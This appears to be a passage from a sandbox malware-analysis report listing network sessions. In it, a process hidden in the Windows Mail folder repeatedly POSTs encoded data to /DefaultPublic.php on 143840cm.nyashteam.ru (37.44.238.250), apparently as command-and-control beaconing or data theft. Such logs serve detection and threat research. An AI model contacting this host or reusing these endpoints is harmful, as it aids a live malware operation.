Nov 25, 2024 22:38:14.051836014 CET	1048	OUT	Data Raw: 5f 5e 5f 5f 5d 5d 50 55 59 59 54 56 57 5d 55 5a 58 5d 5b 5b 59 5e 56 43 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _^__]]PUYYTVW]UZX][[Y^VCZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV _')=9$_'6(X'5)Z" 8^$(#"-.#2#*>&\%#P-<
Nov 25, 2024 22:38:15.010190010 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:15.256994009 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49812	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:15.991009951 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:16.348705053 CET	1048	OUT	Data Raw: 5a 59 5a 59 5d 59 55 54 59 59 54 56 57 5c 55 5b 58 54 5b 59 59 5d 56 48 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZYZY]YUTYYTVW\U[XT[YY]VHZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#'#2Z(*8'%;261"',;8#V<3<.\:C#)T4+&\%#P-8
Nov 25, 2024 22:38:17.307492018 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:17.548887014 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49817	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:17.797816992 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:18.147046089 CET	1048	OUT	Data Raw: 5a 5e 5f 59 5d 58 55 53 59 59 54 56 57 59 55 59 58 5a 5b 58 59 5a 56 41 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z^_Y]XUSYYTVWYUYXZ[XYZVAZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Z'?*?3/%""'.87<+(+1=-6<_?!+(>&\%#P-,
Nov 25, 2024 22:38:19.122361898 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:19.360945940 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49823	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:19.655529976 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:20.004967928 CET	1048	OUT	Data Raw: 5a 5e 5f 59 5d 5e 55 56 59 59 54 56 57 59 55 5c 58 5a 5b 5d 59 51 56 45 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z^_Y]^UVYYTVWYU\XZ[]YQVEZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV X$9?\+'64X%=[!7$,(;0(.]953=!4?&\%#P-,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49824	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:20.345016956 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:20.692573071 CET	1764	OUT	Data Raw: 5a 5d 5f 58 5d 59 50 55 59 59 54 56 57 51 55 53 58 5c 5b 58 59 59 56 43 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z]_X]YPUYYTVWQUSX\[XYYVCZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#3.Z?$7&6.50S,T(+(X+-/*"#]+.&\%#P-
Nov 25, 2024 22:38:21.615932941 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:21.851911068 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 10 23 3e 33 1a 24 3d 0c 1c 2a 02 02 07 31 2b 3a 00 24 03 28 0b 21 1d 3d 5f 30 12 20 0c 20 3c 32 13 2b 07 3e 0e 27 2d 35 05 27 31 2e 51 01 13 21 06 35 33 35 11 3b 33 23 5d 25 5e 24 08 27 31 26 5a 3c 07 27 57 22 30 31 5d 3c 54 31 11 2c 05 37 02 2b 2b 33 5b 3b 33 33 53 22 2f 2e 5f 08 13 23 1f 29 2f 0d 53 27 37 23 5f 25 12 3c 0f 22 14 3a 19 30 0d 0f 57 22 05 20 07 3f 04 3b 04 22 58 3d 0a 30 03 32 16 30 0f 37 19 27 13 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %#>3$=*1+:$(!=_0 <2+>'-5'1.Q!535;3#]%^$'1&Z<'W"01]<T1,7++3[;33S"/._#)/S'7#_%<":0W" ?;"X=0207'"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49825	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:20.469507933 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:20.817441940 CET	1048	OUT	Data Raw: 5f 58 5f 5c 5d 5f 55 52 59 59 54 56 57 50 55 5a 58 5b 5b 5c 59 5c 56 47 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _X_\]_URYYTVWPUZX[[\Y\VGZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV ^$#<: $5;1&!Z#7;.8+++X(>.<Z>;\<&\%#P-
Nov 25, 2024 22:38:21.832458973 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:22.150496006 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49831	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:22.425575972 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:22.770597935 CET	1048	OUT	Data Raw: 5a 5d 5a 5e 58 5b 50 56 59 59 54 56 57 5f 55 5a 58 5d 5b 59 59 5d 56 45 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z]Z^X[PVYYTVW_UZX][YY]VEZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [00!?4_$5'%%Z64,W,(+ Y+=,%#*"$(>&\%#P-
Nov 25, 2024 22:38:23.696367025 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:23.935861111 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49836	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:24.214346886 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:24.567521095 CET	1048	OUT	Data Raw: 5f 58 5f 5e 5d 58 55 57 59 59 54 56 57 50 55 5c 58 5b 5b 59 59 58 56 45 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _X_^]XUWYYTVWPU\X[[YYXVEZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Y$#=?73(Z25"$<V;;#(+3+!-C0_*<<&\%#P-
Nov 25, 2024 22:38:25.483406067 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:25.715715885 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49842	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:25.968277931 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:26.359005928 CET	1048	OUT	Data Raw: 5a 5d 5f 5a 5d 5b 50 51 59 59 54 56 57 5f 55 58 58 5e 5b 5f 59 5b 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z]_Z][PQYYTVW_UXX^[_Y[VIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV X3:Z?\4\$S$&&.6$,<(&\:[)3Z(&\%#P-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49844	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:26.987076044 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:27.333187103 CET	1764	OUT	Data Raw: 5f 59 5f 52 5d 5c 55 54 59 59 54 56 57 5d 55 59 58 55 5b 5d 59 5a 56 47 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _Y_R]\UTYYTVW]UYXU[]YZVGZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [$ >=9#05(^'%2!3,(<;]+"X.8)$*.&\%#P-<
Nov 25, 2024 22:38:28.257292032 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:28.491801977 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 1d 20 03 37 56 33 3d 00 54 2a 2c 2f 13 32 16 3e 07 25 3d 2c 42 23 34 21 1d 27 2c 37 50 37 3c 31 01 29 3d 2e 0d 33 3d 35 04 27 31 2e 51 01 13 22 1c 22 0a 36 0d 38 0a 37 5e 31 16 38 08 25 1f 25 07 3c 10 2b 1a 23 33 3a 05 3c 32 3a 02 3b 05 28 11 2a 05 30 00 38 20 27 57 22 2f 2e 5f 08 13 23 1f 3e 11 05 53 30 37 11 58 32 3c 37 11 21 14 22 52 30 0d 3e 0c 35 3c 2c 04 3f 3e 38 58 21 3e 25 0b 26 3d 32 5e 30 57 2f 50 25 29 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: % 7V3=T,/2>%=,B#4!',7P7<1)=.3=5'1.Q""687^18%%<+#3:<2:;(08 'W"/._#>S07X2<7!"R0>5<,?>8X!>%&=2^0W/P%)"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49845	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:27.144087076 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:27.489392042 CET	1048	OUT	Data Raw: 5f 5d 5f 53 5d 50 50 56 59 59 54 56 57 5a 55 5a 58 5f 5b 52 59 5e 56 46 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _]_S]PPVYYTVWZUZX_[RY^VFZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV X'32^=4_'S?25.#7/.8+);[?!2X:C8^";\?.&\%#P-
Nov 25, 2024 22:38:28.460527897 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:28.705116987 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49850	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:28.973983049 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:29.333400965 CET	1048	OUT	Data Raw: 5f 5a 5a 5e 5d 5b 50 57 59 59 54 56 57 5d 55 5e 58 54 5b 5f 59 59 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _ZZ^][PWYYTVW]U^XT[_YYVIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#%3<4_$542Z640U/(W+8;<Y9%$\*+.&\%#P-<
Nov 25, 2024 22:38:30.396142960 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:30.650590897 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49856	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:30.894843102 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:31.239448071 CET	1048	OUT	Data Raw: 5a 55 5f 53 5d 50 55 57 59 59 54 56 57 5a 55 5c 58 5f 5b 58 59 5e 56 45 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZU_S]PUWYYTVWZU\X_[XY^VEZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [$ =<\$Z$,1%%60,'+;(T&.+=?>&\%#P-
Nov 25, 2024 22:38:32.173028946 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:32.407680035 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49862	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:32.653418064 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:33.005213022 CET	1048	OUT	Data Raw: 5f 58 5f 5e 58 5d 50 51 59 59 54 56 57 5f 55 58 58 5b 5b 58 59 5f 56 42 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _X_^X]PQYYTVW_UXX[[XY_VBZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV $#:?) ]36$&5X5'?,(4?8](2],63*1;?>&\%#P-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49863	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:33.627557039 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:33.973869085 CET	1764	OUT	Data Raw: 5f 5d 5a 5b 5d 5b 55 52 59 59 54 56 57 5e 55 53 58 55 5b 5e 59 50 56 42 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _]Z[][URYYTVW^USXU[^YPVBZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV 'U&X+: $?26.6';.+'U+("&],5*!#?&\%#P-0
Nov 25, 2024 22:38:34.989742041 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:35.253308058 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 59 21 3d 2b 51 25 3d 26 54 29 2f 28 01 32 01 31 59 25 3d 3f 1a 21 1a 39 13 33 3c 01 51 22 2c 3e 10 2b 3e 00 0d 24 00 0c 59 30 0b 2e 51 01 13 22 59 22 33 35 1f 3b 30 28 01 26 28 0e 07 31 0f 3d 07 28 3e 24 0a 36 23 2d 11 28 21 3e 00 38 3c 27 02 2b 3b 27 5b 2f 20 23 19 36 3f 2e 5f 08 13 23 57 2a 3f 09 56 30 24 37 12 24 2f 3f 55 21 14 32 1b 30 0a 31 57 22 05 28 04 3c 2d 30 59 36 00 26 57 26 3e 39 02 27 08 34 0a 24 13 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %Y!=+Q%=&T)/(21Y%=?!93<Q",>+>$Y0.Q"Y"35;0(&(1=(>$6#-(!>8<'+;'[/ #6?._#W*?V0$7$/?U!201W"(<-0Y6&W&>9'4$"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49864	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:33.750394106 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
